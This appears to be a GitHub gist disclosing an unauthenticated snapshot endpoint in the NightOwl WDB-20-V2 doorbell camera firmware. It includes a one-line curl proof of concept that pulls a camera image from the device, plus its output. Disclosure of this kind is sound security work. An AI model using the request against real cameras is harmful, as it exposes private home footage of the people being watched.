Created
April 24, 2021 14:13
-
-
Save tj-oconnor/16a4116050bbcb4717315f519b944f1f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: | |
| An issue exists in the NightOwl WDB-20-V2 Doorbell camera that allows an unauthenticated user to gain access to snapshots and video streams from the doorbell. The binary "app" running on firmware WDB-20-V2_20190314 offers a web server on port 80 that allows an unauthenticate user to take a snapshot from the doorbell camera via "http://<IP>/snapshot". | |
| Affected Components: | |
| Firmware: WDB-20-V2_20190314, binary:"app" | |
| Futher Information: | |
| The binary "app" provides undocumented functionality on a webserver, including a "snapshot" function that enables unauthenticated users to take a snapshot of the camera. | |
| https://cloud.binary.ninja/embed/f4400a22-c438-403a-bf2a-939ca44a4f6b | |
| Proof of Concept: | |
| $ curl http://<IP>/snapshot --output snapshot.jpg | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 12442 100 12442 0 0 15191 0 --:--:-- --:--:-- --:--:-- 15173 | |
| $ file snapshot.jpg | |
| snapshot.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x360, components 3 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment